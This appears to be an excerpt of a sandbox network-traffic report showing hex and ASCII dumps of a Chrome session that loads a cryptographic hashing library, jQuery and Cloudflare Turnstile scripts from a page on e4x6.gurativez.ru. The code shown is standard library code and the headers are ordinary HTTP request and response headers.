                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                                                              Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                                                              Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                                                              Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                                                              Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                                              Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.649733104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:56 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://e4x6.gurativez.ru/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:56 UTC386INHTTP/1.1 302 Found
                                                                                              Date: Thu, 19 Dec 2024 13:35:56 GMT
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c759eb8141f2-EWR
                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.649734151.101.66.1374436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:56 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                              Host: code.jquery.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://e4x6.gurativez.ru/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:56 UTC613INHTTP/1.1 200 OK
                                                                                              Connection: close
                                                                                              Content-Length: 89501
                                                                                              Server: nginx
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                              ETag: "28feccc0-15d9d"
                                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 3136888
                                                                                              Date: Thu, 19 Dec 2024 13:35:56 GMT
                                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740026-EWR
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Cache-Hits: 2774, 0
                                                                                              X-Timer: S1734615356.463312,VS0,VE1
                                                                                              Vary: Accept-Encoding
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                              2024-12-19 13:35:56 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.649743104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:57 UTC648OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://e4x6.gurativez.ru/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:58 UTC471INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:35:58 GMT
                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                              Content-Length: 47692
                                                                                              Connection: close
                                                                                              accept-ranges: bytes
                                                                                              last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                              access-control-allow-origin: *
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c764488af02d-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
